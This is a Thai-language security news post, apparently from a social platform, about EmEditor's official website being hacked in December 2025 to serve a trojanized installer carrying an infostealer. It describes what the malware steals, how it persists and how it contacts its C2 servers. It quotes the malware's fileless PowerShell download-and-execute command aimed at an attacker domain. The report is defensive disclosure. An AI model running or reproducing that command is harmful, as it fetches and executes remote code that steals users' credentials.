เว็บไซต์ทางการ EmEditor Editorเป็นฐานปล่อยมัลแวร์

เว็บไซต์อย่างเป็นทางการของ EmEditor Editor ถูกแฮกเพื่อใช้เป็นฐานปล่อยมัลแวร์

การปล่อยมัลแวร์ใส่เหยื่อนั้นหลายครั้งมักจะเป็นการใช้วิธีการหลอกลวงแบบ Phishing เพื่อให้ดาวน์โหลดจากเว็บไซต์ปลอม แต่ในบางครั้งเว็บไซต์จริงก็อาจถูกแฮกเพื่อนำมาใช้ในการปล่อยมัลแวร์ได้เช่นกัน

จากรายงานโดยเว็บไซต์ Cyber Security News ได้กล่าวถึงการตรวจพบแคมเปญการโจมตีในรูปแบบ การโจมตีห่วงโซ่อุปทาน หรือ Supply Chain Attacks ผ่านทางการแฮกเว็บไซต์อย่างเป็นทางการของเครื่องมือแก้ไขข้อความยอดนิยม EmEditor Editor เพื่อปล่อยมัลแวร์ประเภทขโมยข้อมูลจากเครื่องของเหยื่อ หรือ Infostealer (ซึ่งแหล่งข่าวไม่ได้ระบุชื่อไว้) ด้วยการแฮกเพื่อเปลี่ยนเส้นทางการดาวน์โหลด (Download Path) จากไฟล์ดาวน์โหลดของแท้ ไปยังไฟล์ปลอมที่มีการสอดแทรกมัลแวร์ไว้แทน ซึ่งการแจ้งเตือนเรื่องแคมเปญดังกล่าวนั้นมาจากทางบริษัทผู้พัฒนา EmEditor Editor เอง โดยทางบริษัทได้แจ้งเตือนว่า การแฮกเกิดขึ้นระหว่างวันที่ 19 - 22 ธันวาคม ค.ศ. 2025 (พ.ศ. 2568) ที่ผ่านมา ซึ่งนับระยะเวลาเพียงแค่ 4 วันเท่านั้น แต่ใน 4 วันนี้ผู้ที่ดาวน์โหลด EmEditor Editor เวอร์ชัน 25.4.3 ผ่านทางปุ่ม Download Now ที่อยู่บนเว็บไซต์ ถือว่าเป็นผู้อยู่ใต้ความเสี่ยง เนื่องจากไฟล์ที่ดาวน์โหลดไปนั้นเป็นแอปพลิเคชันปลอม

โดยไฟล์แอปพลิเคชันปลอมดังกล่าวนั้น รูปร่างหน้าตาของไฟล์ติดตั้งจะดูเหมือนกับไฟล์ติดตั้งของแท้มากจนแทบแยกไม่ออก แต่ลายเซ็นดิจิทัล (Digital Signature) ที่อยู่บนตัวไฟล์นั้น แทนที่จะเป็นของทางบริษัท กลับเป็นของบริษัทที่ไม่มีที่มาที่ไปอย่าง “WALSHAM INVESTMENTS LIMITED” แทน ทำให้เป็นจุดสังเกตที่มองเห็นได้ชัดเจนว่าไฟล์ไหนจริง ไฟล์ไหนปลอม ซึ่งสำหรับไฟล์ติดตั้งนี้ ทางทีมวิจัยจาก Qianxin บริษัทผู้พัฒนาซอฟต์แวร์แอนตี้ไวรัสจากจีน ยังได้เผยอีกว่ามีการตรวจพบไฟล์มัลแวร์ (Payload) แบบ Infostealer ฝังตัว (Embeded) อยู่บนไฟล์ติดตั้งปลอมในรูปแบบโค้ด VBScript

ซึ่งโค้ดดังกล่าวนั้นจะถูกรันขึ้นมาระหว่างขั้นตอนการติดตั้ง ที่จะนำไปสู่การรันคำสั่ง PowerShell powershell.exe “irm emeditorjp.com | iex” ขึ้นมาโดยคำสั่งนี้จะนำไปสู่การรันโค้ดมัลแวร์ลงบนหน่วยความจำ (Memory) โดยตรง ทำให้เครื่องมือรักษาความปลอดภัยบนเครื่องส่วนมากมักจะไม่สามารถตรวจพบได้ เนื่องจากไม่เหลือไฟล์มัลแวร์ทิ้งไว้บนฮาร์ดดิสก์ให้ตรวจสอบ

มัลแวร์ที่ไม่ปรากฏชื่อตัวนี้นั้น มีความสามารถในการขโมยข้อมูลมากมาย โดยหลังจากติดตั้งนั้น มัลแวร์จะเริ่มทำการขโมยข้อมูลจากเว็บเบราว์เซอร์ Chrome, Edge, Brave, และ Opera ในทันที โดยข้อมูลจะครอบคลุมตั้งแต่ ไฟล์ Cookies, ข้อมูลการเข้าเว็บไซต์ต่าง ๆ, และข้อมูลการล็อกอิน แล้วจึงทำการเข้าบุกขโมยข้อมูลแอปพลิเคชันสำหรับการทำงานที่องค์กรต่าง ๆ นิยมใช้งาน เช่น Discord, Slack, Zoom, Microsoft Teams, WinSCP, และ PuTTY อีกด้วย ทำให้มัลแวร์ตัวนี้สามารถสร้างความเสียหายให้กับเหยื่อในระดับองค์กรธุรกิจได้อย่างมาก มากไปกว่านั้นตัวมัลแวร์ยังมีความสามารถในการขโมยรหัสเข้าใช้งานบัญชีโฆษณาบน Facebook, เข้าควบคุมข้อมูลบน Clipboard เพื่อขโมยข้อมูลเกี่ยวกับคริปโตเคอร์เรนซี และการสร้างการควบคุมจากระยะไกลเพื่อให้แฮกเกอร์สามารถเข้าขโมยข้อมูลเพิ่มเติมภายหลังได้

สำหรับในด้านการสร้างความคงทนของตัวมัลแวร์บนระบบ (Persistence) นั้น ตัวมัลแวร์จะใช้งานส่วนเสริม (Extension) ของเว็บเบราว์เซอร์ที่มีชื่อว่า “Google Drive Caching” ในการเข้าสู่เครื่องของเหยื่อโดยไม่ได้รับอนุญาตหลังจากที่ฝังตัวลงบนเครื่องได้สำเร็จ ซึ่งส่วนเสริมนี้จะมีฟีเจอร์ Domain Generation Algorithm ใช้ในการสร้างโดเมนเพื่อติดต่อกับเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) แบบค่าไม่คงที่ (Dynamic) ได้ ทำให้ตรวจสอบกวาดล้างได้ยากมาก

ทางบริษัทผู้พัฒนาได้แนะนำว่า ผู้ที่สงสัยว่าเครื่องติดมัลแวร์เรียบร้อยแล้วให้ทำการตัดอินเทอร์เน็ตในทันที แล้วเริ่มทำการสแกนกวาดล้างมัลแวร์ แล้วจึงทำการเปลี่ยนรหัสทุกอย่างที่มีบนเครื่องเพื่อความปลอดภัย

#ติดเทรนด์ #Lemon8ฮาวทู #ป้ายยากับlemon8 #lemon8ไดอารี่ #freedomhack

1/21 แก้ไขเป็น

โพสต์ที่เกี่ยวข้อง

คู่มือเด็กรามมือใหม่! รวมเว็บไซต์สำคัญที่ต้องใช้ตลอดหลักสูตร 📖💻"
#เด็กราม #รีวิวราม #มหาวิทยาลัยรามคำแหง #เรียนออนไลน์ #เว็บไซต์แนะนำ #StudyTips #Ramkhamhaeng #TongOnTheGo #พรีดีกรี
ปักเป้าตัวเป้ง🐡

ปักเป้าตัวเป้ง🐡

ถูกใจ 528 ครั้ง

แนะนำเว็บไซต์อ่านข่าว ฝึกภาษาอังกฤษ 📌🗞️💞🔥
ได้ทั้งศัพท์ + อัปเดตโลกไปพร้อมกันเลย!! การอ่านข่าวเป็นวิธีฝึกภาษาที่ได้ผลจริง เพราะได้เจอคำศัพท์ที่ใช้ในชีวิตจริง และสำนวนธรรมชาติของเจ้าของภาษา เว็บตามนี้เลยย 1.https://www.bbc.com/ 2.https://edition.cnn.com/?refresh=1 3.https://www.nytimes.com/ 4.https://www.theguardian.com/international
݁ ˖Ი𐑼⋆

݁ ˖Ი𐑼⋆

ถูกใจ 813 ครั้ง

แอพและเว็บไซต์ที่เด็กรามต้องรู้💭✅
มีคนถามมาเยอะมากรามใช้แอพอะไรบ้าง อันนี้เป็นส่วนที่ใช้หลักๆ ใครเรียนรามเรียนเหมือนกันสู้ๆนะคะ🥰💭💌 #รามคำแหง #เรียนราม #dek70 #ติดเทรนด์ #lemon8
น้ำตาล🤎🤍

น้ำตาล🤎🤍

ถูกใจ 22 ครั้ง

ภาพหน้าจอแล็ปท็อปแสดงอินเทอร์เฟซ Claude AI พร้อมข้อความต้อนรับและช่องป้อนคำสั่ง มีสมุดจด AI WORKFLOW และแก้วกาแฟโลโก้ Claude ข้อความหลักระบุ 'AI Tool Claude Vocabulary' และ 'ศัพท์ที่ควรรู้ ถ้าคิดจะเริ่มจริงจังกับ Claude'.
Claude Glossary — ศัพท์ที่ควรรู้ ถ้าเริ่มจริงจังกับ Claude🧡
Claude Glossary — ศัพท์ที่ควรรู้ ถ้าเริ่มจริงจังกับ AI 🤖 ช่วงนี้หลายคนเริ่มใช้ Claude มากขึ้นเรื่อย ๆ แต่เวลาอ่าน Documentation หรือดูคลิปเกี่ยวกับ AI ก็มักจะเจอศัพท์เต็มไปหมด เช่น * Token * Context Window * MCP * Artifact * Hallucination * Temperature บางคำฟังดูเหมือนศัพท์วิศวกร 😵‍
NerdDailyDose

NerdDailyDose

ถูกใจ 351 ครั้ง

สมัคร Shopee Live ยังไง?
สมัคร Shopee affiliate Live ทำตามนี้ได้เลยครับ📍 #ShopeeAffiliate #นายหน้าShopee #affiliatemarketing #shopeeaffiliates
ลองซักตั้ง (ช่องใหม่)

ลองซักตั้ง (ช่องใหม่)

ถูกใจ 141 ครั้ง

ภาพหญิงสาวในชุดสีเขียวอ่อนยืนยิ้มกลางถนนที่มีต้นไม้ใบไม้สีทองร่วงหล่น พร้อมข้อความ 'แชร์ทริคหางานในประเทศแคนาดา ep.2 หางานผ่านช่องทางไหน?'
ภาพหน้าจอโทรศัพท์แสดงไอคอนแอปหางาน 4 แอป ได้แก่ LinkedIn, Job Bank, Glassdoor และ Indeed พร้อมคำอธิบายคุณสมบัติหลักของแต่ละแอปและระบุว่าเป็นแพลตฟอร์มที่มีทั้งเว็บไซต์และ��แอปมือถือ
ภาพหน้าจอ LinkedIn แสดงการสร้างโปรไฟล์ การเชื่อมต่อ และแพลตฟอร์มหางาน พร้อมข้อความระบุว่าบางครั้งแมวมองอาจเข้ามาดูโปรไฟล์และเสนองานให้สมัคร
แชร์ทริคหางานในแคนาดา ep.2 : รวมเว็บไซต์หางานแคนาดา 👩‍💻
สวัสดีค่ะ ep.2 แอนขอพูดถึงเว็บไซต์หลักๆที่แอนใช้ในการหางานในประเทศแคนาดานะคะ 1. LinkedIn : www.linkedin.com ⭐️ หลายๆคนในวัยทำงานน่าจะรู้จักเว็บไซต์นี้กันแล้ว ใครยังไม่มีแนะนำให้สมัครและสร้าง profile ของตนเองเอาไว้ มีหลายบริษัทให้แนบลิ้งค์ profile ตอนสมัครงานเช่นกันค่า (แต่มักจะเป็น optional น้า)
Ann wanders Canada

Ann wanders Canada

ถูกใจ 536 ครั้ง

คนส่วนใหญ่ “ไม่รู้” ว่ายังมีคอร์สออนไลน์ฟรี
ที่ได้ใบเซอร์จริง เอาไปใส่พอร์ต สมัครงานได้แบบไม่ต้องเสียเงิน 😳 #เรียนฟรี #คอร์สออนไลน์ #ใบเซอร์
Meximum

Meximum

ถูกใจ 284 ครั้ง

เว็บไซต์สถานศึกษา และบริษัทเทค กว่า 700 แห่งถูกแฮก
เว็บไซต์สถานศึกษา และบริษัทเทค กว่า 700 แห่ง ถูกแฮกมาใช้ในแคมเปญ ClickFix จากรายงานโดยเว็บไซต์อย่างเป็นทางการของบริษัทผู้พัฒนาเครื่องมือต่อต้านมัลแวร์ Malwarebytes ได้กล่าวถึงการตรวจพบช่องโหว่ของเครื่องมือจัดการคอนเทนต์บนเว็บไซต์ หรือ Content Management System (CMS) ที่มีชื่อว่า Ghost ด้วยการอาศ
FreedomHack 󱢏

FreedomHack 󱢏

ถูกใจ 1 ครั้ง

ภาพสรุปโวหารการเขียน อธิบายโวหาร เน้นความรู้ ความเข้าใจ และบรรยายโวหาร เน้นการเล่าเรื่องตามลำดับเหตุการณ์ พร้อมจุดสังเกตและตัวอย่าง โดยระบุว่าภาษาไทยออกสอบบ่อยมากในการสอบนายสิบตำรวจ
ภาพสรุปโวหารการเขียนต่อจากภาพแรก โดยมีตัวอย่างของบรรยายโวหาร และอธิบายพรรณนาโวหารที่เน้นความสวยงาม อารมณ์ความรู้สึก พร้อมตัวอย่าง รวมถึงเทศนาโวหารที่เน้นการสั่งสอน ตักเตือน และโน้มน้าวใจ
ภาพสรุปโวหารการเขียนต่อจากภาพที่สอง โดยมีตัวอย่างของเทศนาโวหาร และอธิบายสาธกโวหารที่เน้นการยกตัวอย่างเพื่อสนับสนุนความคิด พร้อมตัวอย่าง รวมถึงอุปมาโวหารที่เน้นการเปรียบเทียบเพื่อให้เห็นภาพและเข้าใจง่ายขึ้น
ตำรวจอำนวยการ 👮🏻
#ไฟล์สรุปภิญญาพัชญ์ #สอบตํารวจอํานวยการ #สอบราชการ
a.piinypht🤍🌻

a.piinypht🤍🌻

ถูกใจ 19 ครั้ง

ภาพผู้หญิงกำลังชวนทำ Quiz เช็คนิสัยทางการเงินปี 2026 พร้อมแสดงตัวอย่างผลลัพธ์การทดสอบ เช่น ชอบออมเงิน 70% และใช้เงินเก่ง 18% โดยมีเป้าหมายให้แต่ละหมวดหมู่สมดุลที่ 45-55%
ภาพหน้าจอเว็บไซต์ SET ตลาดหลักทรัพย์แห่งประเทศไทย สำหรับตรวจสอบสุขภาพทางการเงิน มีโลโก้กระเป๋าเงินกับหูฟังแพทย์ และข้อความระบุว่��ามีแบบทดสอบการเงินพื้นฐาน การลงทุน ทรัพย์สิน และหนี้สินแบบเจาะลึก
ภาพหน้าจอเว็บไซต์ MULA ที่มีแบบทดสอบ 16 ข้อ เพื่อสำรวจนิสัยการใช้เงิน พร้อมตัวอย่างคำถามและผลลัพธ์การทดสอบ เช่น ชอบออมเงิน 70% และไม่ชอบจัดการเรื่องเงินทอง 10%
ชวนทำ Quiz เช็คนิสัยทางการเงินก่อนเริ่มปี 2026
ใครที่ไม่รู้ว่าจะสำรวจ ประเมินนิสัยทางการเงินของตัวเองยังไง เราโอเคแล้วหรือกำลังวิกฤตลองมาทำ quiz แบบทดสอบ 2 ตัวนี้ได้ค่ะ ของทางตลาดหลักทรัพย์แห่งประเทศไทย SET และเว็บไซต์ MULA ถึงจะไม่ใช่แบบสำรวจแบบละเอียดเฉพาะบุคคล แต่โจลี่ว่ามันก็ช่วยนะคะถ้าเราตอบแบบซื่อสัตย์ เราอาจจะออมเงินเก่ง แต่ก็มีห
JolieHappyEng

JolieHappyEng

ถูกใจ 12 ครั้ง

ดูเพิ่มเติม